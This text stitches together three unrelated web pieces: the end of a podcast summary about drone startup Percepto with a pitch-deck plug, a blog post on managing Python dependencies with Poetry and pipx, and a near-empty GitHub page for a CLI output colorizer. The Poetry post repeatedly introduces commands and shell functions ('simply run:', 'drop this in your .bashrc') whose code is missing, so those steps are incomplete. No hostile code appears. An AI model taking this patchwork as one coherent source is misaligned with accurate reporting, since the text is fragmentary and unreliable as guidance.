actionable reports. Residents may find this not only helps with the consistency of service, but can help keep them safer and avoid disasters like wildfires caused by faulty equipment. Storytelling is everything which is something that Dor Abuhasira was able to master. Being able to capture the essence of what you are doing in 15 to 20 slides is the key. For a winning deck, take a look at the pitch deck template created by Silicon Valley legend, Peter Thiel (see it here) where the most critical slides are highlighted. Remember to unlock the pitch deck template that is being used by founders around the world to raise millions below. To get here Percepto ended up adding a fourth cofounder, to come in as their Chief Commercial Officer. Some of Dor’s top takeaways have also included understanding your customer and their real need and sales cycle, as well as constantly working to de-risk your business, and how to present to investors when you are creating a new market, with new technology, and few if any benchmarks to make them comfortable. Listen in to the full podcast episode to find out more, including: Alejandro Cremades · EP 313 Dor Abuhasira On Raising $73 Million To Create Autonomous Drones
1
Improving Python Dependency Management with Pipx and Poetry
Over time, how I develop applications in python has changed noticeably. I will divide the topic into three sections and see how they tie into each other at the end. Under development, the issues I will focus on are the following: Historically, the way to do dependency management was through requirements.txt. I found requirements.txt hard to manage. In that setup, adding a dependency and installing it was two steps: While focused on development, I would often forget one or both of these steps. Also, the lack of a lock file was a small downside for me (could be a much larger downside for others). The separation between pip and requirements.txt can also easily lead you to accidentally depend on packages installed on your system or in your virtualenv but not specified in your requirements.txt. Managing virtualenvs was also difficult. As a virtualenv and a project are not related, you need a directory structure. Otherwise, you can’t tell which virtualenv is being used for which project. You can use the same virtualenvs for multiple projects, but that partially defeats the point of virtualenvs and makes requirements.txt more error-prone (higher chances of forgetting to add packages to it). The approach generally used is one of the following two: I preferred the second one as the first one nests the source code one directory deeper. In PEP-518 , python standardized the pyproject.toml file which allows users to choose alternate build systems for package generation. One such project that provides an alternate build system is Poetry . Poetry hits the nail on the head and solves my major gripes with traditional tooling. Poetry manages the virtualenvs automatically and keeps track of which project uses which virtualenv automatically. Working on an existing project which uses poetry is as simple as this: The poetry install command sets up the virtualenv, install all the required dependencies inside that, and sets up any commands accordingly (I will get to this soon). To activate the virtualenv, simply run: I wrap this in a small function which lets me toggle it quickly: Running poet activates the virtualenv if it is not active and deactivates it if it is active. To make things even easier, I automatically activate and deactivate the virtualenv as I enter and leave the project directory. To do so, simply drop this in your .bashrc. This ties in well with the poet function; if you use poet anytime in a bash session, activation switches from automatic to manual and changing directories no longer auto-toggles the virtualenv. Instead of using requirements.txt, poetry stores the dependencies inside pyproject.toml. Poetry is more strict compared to pip in resolving versioning issues. Dependencies and dev-dependencies are stored inside tool.poetry.dependencies and tool.poetry.dev-dependencies respectively. Here is an example of a pyproject.toml for a project I am working on. One of the upsides of poetry is that you don’t have to manage the dependencies in pyproject.toml file yourself. Poetry adds an npm-like interface for adding and removing dependencies. To add a dependency to your project, simply run poetry add bar and it will add it to your pyproject.toml file and install it in the virtualenv as well. To remove a dependency, just run poetry remove bar. For development dependencies, just add the --dev flag to the commands. Since poetry replaces the build system, we can now configure the build using poetry via pyproject.toml. Inside pyproject.toml, the tool.poetry section stores all the build info needed; tool.poetry contains the metadata, tool.poetry.dependencies contains the dependencies, tool.poetry.source contains private repository details (in case, you don’t want to use PyPi). One of the options is tool.poetry.scripts. It contains scripts that the project exposes. This replaces console_scripts in entry_points of setuptools. This will add a script named foobar in your PATH. Running that is equivalent to running the following script For further details, check the reference . Poetry also removes the need for manually doing editable installs (pip install -e .). The package is automatically installed as editable when you run poetry install. Any scripts specified in tool.poetry.scripts are automatically available in your PATH when you activate the venv. To build the package, simply run poetry build. This will generate a wheel and a tarball in the dist folder. To publish the package to PyPi (or another repo), simply run poetry publish. You can combine the build and publish into one command with poetry publish --build. This part is more user-facing rather than dev-facing. If you want to use two packages globally that expose some scripts to the user, (e.g. awscli, youtube-dl, etc.) the general approach to do so is to run something like pip install --user youtube-dl. This install the package at the user level and exposes the script through ~/.local/bin/youtube-dl. However, this installs all the packages at the same user level. Hypothetically, if you have two packages foo and bar which have conflicting dependencies, this causes an issue. If you run, While installing bar, pip will install the dependencies for bar which will break foo after warning you . To solve this, there is pipx . Pipx installs each package in a separate virtualenv without requiring the user to activate said virtualenv before using the package. In the same scenario as before, doing the following works just fine. In this scenario, both bar and foo are installed in separate virtualenvs so the dependency conflict doesn’t matter. Prefixing any command with wnp runs it outside the virtualenv if a virtualenv is active. Running pm turns off automatic virtualenv activation.
1
Show HN: Limner – colorizes and transforms CLI outputs
{{ message }} SignorMercurio/limner You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.